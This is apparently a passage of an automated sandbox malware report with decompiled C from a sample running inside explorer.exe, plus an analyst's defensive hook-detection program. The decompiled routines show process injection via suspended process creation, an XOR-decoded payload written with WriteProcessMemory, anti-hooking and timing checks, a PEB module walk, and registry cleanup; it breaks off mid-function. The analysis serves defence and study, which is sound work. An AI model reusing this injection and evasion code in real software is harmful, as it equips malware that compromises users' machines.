    				long* _v8;
    				int _v12;
    
    				_v8 = __eax;
    				if( *((char*)( *0x7cb508)) != 0xe9) {
    					_v12 = CryptDestroyKey(_v8);
    				}
    				return _v12;
    			}
    Addresses: 0x007c1afe, 0x007c1b09, 0x007c1b15, 0x007c1b15, 0x007c1b1e

    APIs
    • CryptDestroyKey.ADVAPI32(?), ref: 007C1B0F
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
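E007C17A2, E007C153C, E007C1B20 and E007C1AF8 each guard a CryptoAPI call with the same test: dereference the stored API pointer (0x7cb460, 0x7cb458, 0x7cb50c, 0x7cb508) and call the function only if its first byte is not 0xE9, a JMP rel32, which is what most user-mode hooking engines write over the prologue; when it is, the call is skipped and the never-initialised local (`_v20`, `_v16`, `_v12`) is returned. The C program below is an added example, not the sample's code and not from this report: it runs that check over constructed byte strings (nothing here is captured from the sample) and goes beyond the single-byte test to the other trampoline shapes a hook engine may install, resolving where each one jumps. The API address 0x7C800000 and the trampoline target 0x007D0000 are hypothetical.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef enum {
    HOOK_NONE = 0,
    HOOK_JMP_REL32,    /* E9 rel32        : the only form the sample tests */
    HOOK_JMP_ABS_IND,  /* FF 25 disp32    : jmp dword ptr [addr]            */
    HOOK_PUSH_RET,     /* 68 imm32 C3     : push addr; ret                  */
    HOOK_MOV_EAX_JMP   /* B8 imm32 FF E0  : mov eax, addr; jmp eax          */
} hook_kind;

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Classify the first bytes of a function. `fn_va` is the address the bytes
 * live at (needed to resolve a relative JMP). `target`, if given, receives
 * where the trampoline goes; for the indirect form it receives the pointer
 * slot, since the final destination is only known at run time. */
hook_kind classify_prologue(const uint8_t *code, size_t len, uint32_t fn_va, uint32_t *target)
{
    if (target) *target = 0;
    if (len >= 5 && code[0] == 0xE9) {
        if (target) *target = fn_va + 5 + le32(code + 1);   /* rel32, wraps mod 2^32 */
        return HOOK_JMP_REL32;
    }
    if (len >= 6 && code[0] == 0xFF && code[1] == 0x25) {
        if (target) *target = le32(code + 2);
        return HOOK_JMP_ABS_IND;
    }
    if (len >= 6 && code[0] == 0x68 && code[5] == 0xC3) {
        if (target) *target = le32(code + 1);
        return HOOK_PUSH_RET;
    }
    if (len >= 7 && code[0] == 0xB8 && code[5] == 0xFF && code[6] == 0xE0) {
        if (target) *target = le32(code + 1);
        return HOOK_MOV_EAX_JMP;
    }
    return HOOK_NONE;
}

/* Exactly the sample's test: is the first byte a JMP rel32? */
int first_byte_is_jmp(const uint8_t *code, size_t len)
{
    return len >= 1 && code[0] == 0xE9;
}

/* Where a detected trampoline lands; 0 when the prologue looks clean. */
uint32_t hook_target(const uint8_t *code, size_t len, uint32_t fn_va)
{
    uint32_t t;
    classify_prologue(code, len, fn_va, &t);
    return t;
}

/* Constructed prologues for the demonstration, not bytes from the sample. */
const uint8_t PROLOGUE_CLEAN[5]   = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };             /* mov edi,edi; push ebp; mov ebp,esp */
const uint8_t PROLOGUE_JMP[5]     = { 0xE9, 0x00, 0x10, 0x00, 0x00 };             /* jmp +0x1000 */
const uint8_t PROLOGUE_JMP_IND[6] = { 0xFF, 0x25, 0x00, 0x00, 0x7D, 0x00 };       /* jmp [0x007D0000] */
const uint8_t PROLOGUE_PUSHRET[6] = { 0x68, 0x00, 0x00, 0x7D, 0x00, 0xC3 };       /* push 0x007D0000; ret */
const uint8_t PROLOGUE_MOVJMP[7]  = { 0xB8, 0x00, 0x00, 0x7D, 0x00, 0xFF, 0xE0 }; /* mov eax,0x007D0000; jmp eax */

int main(void)
{
    static const char *names[] = { "none", "jmp rel32", "jmp [abs]", "push/ret", "mov eax/jmp eax" };
    const uint32_t fn_va = 0x7C800000u;   /* hypothetical address of the API being checked */
    printf("clean  : %s\n", names[classify_prologue(PROLOGUE_CLEAN, 5, fn_va, NULL)]);
    printf("hooked : %s -> 0x%08x\n", names[classify_prologue(PROLOGUE_JMP, 5, fn_va, NULL)],
           hook_target(PROLOGUE_JMP, 5, fn_va));
    return 0;
}
```

The check is cheap but narrow: it misses a hot-patch hook (a two-byte `EB F9` over `mov edi,edi` that jumps into a rel32 placed in the padding before the function), a detour placed after the first instruction, and any hook set in the implementation an export forwards to; it also fires on a function whose first byte legitimately is 0xE9, as incremental-link thunks are. For a defender the more useful observation is the failure mode on the page: under a hooked API the sample returns an uninitialised value instead of calling, so a trace that shows key material being set up with no matching CryptDecrypt or CryptGenRandom call is itself the tell.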
    APIs
    • CryptDestroyHash.ADVAPI32(?), ref: 007C14E7
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 65%
    			E007C6B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    
    				_v24 = __eax;
    				asm("rdtsc");
    				_v12 = __eax;
    				_v8 = __edx;
    				asm("cpuid");
    				asm("rdtsc");
    				_v20 = 0;
    				_v16 = __edx;
    				 *((intOrPtr*)(_v24 + 4)) = _v16;
    				 *_v24 = _v20;
    				return E007C6A38(_v24,  &_v12);
    			}
    Addresses: 0x007c6b1e, 0x007c6b25, 0x007c6b27, 0x007c6b2a, 0x007c6b2f, 0x007c6b31, 0x007c6b33, 0x007c6b36, 0x007c6b43, 0x007c6b4c, 0x007c6b5c

    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C24F8() {
    				intOrPtr _v8;
    				intOrPtr* _t10;
    
    				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
    				do {
    					_t10 =  *_t10;
    				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
    				_v8 =  *((intOrPtr*)(_t10 + 8));
    				return _v8;
    			}
    Addresses: 0x007c2509, 0x007c250c, 0x007c250c, 0x007c2511, 0x007c251d, 0x007c2528

    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 98%
    			E007C5028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t144;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E007C12DC(_a16) + 1;
    				}
    				E007C1258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L22:
    					return _v8;
    				}
    				E007C1164(E007C10B4(_t109, 0x44),  &_v353);
    				E007C133C( &_v353, "_section");
    				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    				_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
    				_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
    				E007C12B8(_v16, _v24, _a8);
    				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    				E007C12B8(_v16 + _v24 + 8, _a20, _a16);
    				_v24 = 0x29b;
    				E007C13B4( &_v28, _v24 + 0x11);
    				E007C12B8(_v28, _v24, 0x7ca2ac);
    				_t144 = _v24 - 1;
    				if(_t144 < 0) {
    					L9:
    					_v20 = E007C12DC( &_v353) + 1;
    					E007C12B8(_v28 + _v24, _v20,  &_v353);
    					_v24 = _v24 + _v20;
    					_v40 = 0;
    					_v40 = E007C4EF0(_v332.ExtendedRegisters.hProcess, _t224);
    					if(_v40 == 0) {
    						E007C1258( &_v332, 0xcc);
    						_v332.ContextFlags = 0x10007;
    						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    							_v40 = _v332.Eax;
    						}
    					}
    					_t228 = _v40;
    					if(_v40 == 0) {
    						_v40 = E007C4DE0(_v332.ExtendedRegisters.hProcess, _t228);
    					}
    					if(_v40 != 0) {
    						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
    						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
    						E007C1828(_v28);
    						ResumeThread(_v124);
    						if(_a24 == 0) {
    							__eflags = 0;
    							_v8 = 0;
    						} else {
    							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    								_v8 = 0xfffffffe;
    							} else {
    								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    							}
    						}
    						CloseHandle(_v124);
    						CloseHandle(_v332.ExtendedRegisters);
    					}
    					goto L22;
    				}
    				_v44 = _t144 + 1;
    				_v32 = 0;
    				do {
    					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    					_v32 = _v32 + 1;
    					_t55 =  &_v44;
    					 *_t55 = _v44 - 1;
    					_t224 =  *_t55;
    				} while ( *_t55 != 0);
    				goto L9;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 007C5040
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007C508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007C50F5
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 007C510D
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F69
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 007C4FBC
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 007C4FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 007C5209
    • CloseHandle.KERNEL32(?), ref: 007C52C8
      • Part of subcall function 007C4DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 007C4E09
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E39
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E5A
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E7E
    • VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 007C5252
    • WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 007C526C
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ResumeThread.KERNEL32(?), ref: 007C527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 007C5292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 007C52A4
    • CloseHandle.KERNEL32(?), ref: 007C52BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 98%
    			E007C5026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t144;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E007C12DC(_a16) + 1;
    				}
    				E007C1258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L23:
    					return _v8;
    				} else {
    					E007C1164(E007C10B4(_t109, 0x44),  &_v353);
    					E007C133C( &_v353, "_section");
    					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    					_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
    					_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
    					E007C12B8(_v16, _v24, _a8);
    					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    					E007C12B8(_v16 + _v24 + 8, _a20, _a16);
    					_v24 = 0x29b;
    					E007C13B4( &_v28, _v24 + 0x11);
    					E007C12B8(_v28, _v24, 0x7ca2ac);
    					_t144 = _v24 - 1;
    					if(_t144 < 0) {
    						L10:
    						_v20 = E007C12DC( &_v353) + 1;
    						E007C12B8(_v28 + _v24, _v20,  &_v353);
    						_v24 = _v24 + _v20;
    						_v40 = 0;
    						_v40 = E007C4EF0(_v332.ExtendedRegisters.hProcess, _t229);
    						if(_v40 == 0) {
    							E007C1258( &_v332, 0xcc);
    							_v332.ContextFlags = 0x10007;
    							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    								_v40 = _v332.Eax;
    							}
    						}
    						_t233 = _v40;
    						if(_v40 == 0) {
    							_v40 = E007C4DE0(_v332.ExtendedRegisters.hProcess, _t233);
    						}
    						if(_v40 != 0) {
    							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
    							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
    							E007C1828(_v28);
    							ResumeThread(_v124);
    							if(_a24 == 0) {
    								__eflags = 0;
    								_v8 = 0;
    							} else {
    								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    									_v8 = 0xfffffffe;
    								} else {
    									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    								}
    							}
    							CloseHandle(_v124);
    							CloseHandle(_v332.ExtendedRegisters);
    						}
    						goto L23;
    					}
    					_v44 = _t144 + 1;
    					_v32 = 0;
    					do {
    						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    						_v32 = _v32 + 1;
    						_t55 =  &_v44;
    						 *_t55 = _v44 - 1;
    						_t229 =  *_t55;
    					} while ( *_t55 != 0);
    					goto L10;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 007C5040
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007C508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007C50F5
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 007C510D
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F69
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 007C4FBC
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 007C4FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 007C5209
    • CloseHandle.KERNEL32(?), ref: 007C52C8
      • Part of subcall function 007C4DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 007C4E09
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E39
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E5A
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E7E
    • VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 007C5252
    • WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 007C526C
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ResumeThread.KERNEL32(?), ref: 007C527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 007C5292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 007C52A4
    • CloseHandle.KERNEL32(?), ref: 007C52BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 90%
    			E007C80C0(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t63;
    
    				_v8 = __eax;
    				if( *0x7ca038 != 0) {
    					_t50 =  *0x7ca038; // 0x0
    					 *0x7cb4f8(_t50);
    				}
    				 *0x7cc24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x7ca29c = 0xffffffff;
    				_t13 =  *0x7cc24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x7cc24c; // 0x0
    				CloseHandle(_t15);
    				E007C1308( &_v265, 0x7cb518);
    				 *((char*)(_t63 + E007C12DC(0x7cb518) - 0x109)) = 0;
    				E007C133C( &_v265, ".lnk");
    				E007C471C( &_v265, 0, 0);
    				E007C471C(0x7cb518, 0x7530, 0xffffffff);
    				if( *0x7ca574 != 0) {
    					_t48 =  *0x7ca574; // 0x60258
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x7ca034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x7ca260; // 0x7c21a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x7ca260; // 0x7c21a4
    						E007C8064(0x80000001, 0x7cb752, _t60);
    					}
    					E007C4A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x7ca260; // 0x7c21a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x7ca260; // 0x7c21a4
    						E007C8064(0x80000002, 0x7cb752, _t62);
    					}
    					E007C4A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x7cb510; // 0x490000
    				E007C1828(_t31);
    				_t33 =  *0x7ca054; // 0x228
    				ReleaseMutex(_t33);
    				_t35 =  *0x7ca054; // 0x228
    				CloseHandle(_t35);
    				_t37 =  *0x7ca2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007C80DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007C80E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C8106
    • CloseHandle.KERNEL32(00000000), ref: 007C8112
      • Part of subcall function 007C471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
      • Part of subcall function 007C471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
      • Part of subcall function 007C471C: CloseHandle.KERNEL32(?), ref: 007C4790
    • SendMessageA.USER32(00060258,00000010,00000000,00000000), ref: 007C8184
    • SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C81BB
    • ExitProcess.KERNEL32 ref: 007C8244
      • Part of subcall function 007C8064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
      • Part of subcall function 007C8064: RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
    • SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C81FB
      • Part of subcall function 007C4A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 007C4A55
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ReleaseMutex.KERNEL32(00000228), ref: 007C8221
    • CloseHandle.KERNEL32(00000228), ref: 007C822D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 90%
    			E007C80BE(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t64;
    				void* _t66;
    
    				_t64 = _t66;
    				_v8 = __eax;
    				if( *0x7ca038 != 0) {
    					_t50 =  *0x7ca038; // 0x0
    					 *0x7cb4f8(_t50);
    				}
    				 *0x7cc24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x7ca29c = 0xffffffff;
    				_t13 =  *0x7cc24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x7cc24c; // 0x0
    				CloseHandle(_t15);
    				E007C1308( &_v265, 0x7cb518);
    				 *((char*)(_t64 + E007C12DC(0x7cb518) - 0x109)) = 0;
    				E007C133C( &_v265, ".lnk");
    				E007C471C( &_v265, 0, 0);
    				E007C471C(0x7cb518, 0x7530, 0xffffffff);
    				if( *0x7ca574 != 0) {
    					_t48 =  *0x7ca574; // 0x60258
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x7ca034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x7ca260; // 0x7c21a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x7ca260; // 0x7c21a4
    						E007C8064(0x80000001, 0x7cb752, _t60);
    					}
    					E007C4A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x7ca260; // 0x7c21a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x7ca260; // 0x7c21a4
    						E007C8064(0x80000002, 0x7cb752, _t62);
    					}
    					E007C4A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x7cb510; // 0x490000
    				E007C1828(_t31);
    				_t33 =  *0x7ca054; // 0x228
    				ReleaseMutex(_t33);
    				_t35 =  *0x7ca054; // 0x228
    				CloseHandle(_t35);
    				_t37 =  *0x7ca2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007C80DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007C80E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C8106
    • CloseHandle.KERNEL32(00000000), ref: 007C8112
      • Part of subcall function 007C471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
      • Part of subcall function 007C471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
      • Part of subcall function 007C471C: CloseHandle.KERNEL32(?), ref: 007C4790
    • SendMessageA.USER32(00060258,00000010,00000000,00000000), ref: 007C8184
    • ExitProcess.KERNEL32 ref: 007C8244
      • Part of subcall function 007C8064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
      • Part of subcall function 007C8064: RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
    • SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C81BB
    • SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C81FB
      • Part of subcall function 007C4A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 007C4A55
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ReleaseMutex.KERNEL32(00000228), ref: 007C8221
    • CloseHandle.KERNEL32(00000228), ref: 007C822D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C41CC() {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t51;
    
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
    					_v16 = E007C13DC(0x400);
    					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
    					CloseHandle(_v12);
    					if(_v32 != 0) {
    						AllocateAndInitializeSid(0x7ca2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
    						_t51 =  *_v16 - 1;
    						if(_t51 >= 0) {
    							_v36 = _t51 + 1;
    							_v28 = 0;
    							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
    								_v28 = _v28 + 1;
    								_t28 =  &_v36;
    								 *_t28 = _v36 - 1;
    								if( *_t28 != 0) {
    									continue;
    								}
    								goto L10;
    							}
    							_v5 = 1;
    						}
    						L10:
    						FreeSid(_v24);
    					}
    					E007C1440(_v16);
    				}
    				return _v5;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 007C41DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
    • GetLastError.KERNEL32 ref: 007C41F4
    • GetCurrentProcess.KERNEL32 ref: 007C4207
    • OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
    • CloseHandle.KERNEL32(?), ref: 007C424E
    • AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
    • EqualSid.ADVAPI32(?,?), ref: 007C42A2
    • FreeSid.ADVAPI32(?), ref: 007C42BE
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			E007C41C8(intOrPtr* __eax) {
    				char _v5;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				void* _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				void* _t52;
    
    				 *__eax =  *__eax + __eax;
    				_v5 = 0;
    				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
    				if(_v32 == 0 && GetLastError() == 0x3f0) {
    					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
    				}
    				if(_v32 != 0) {
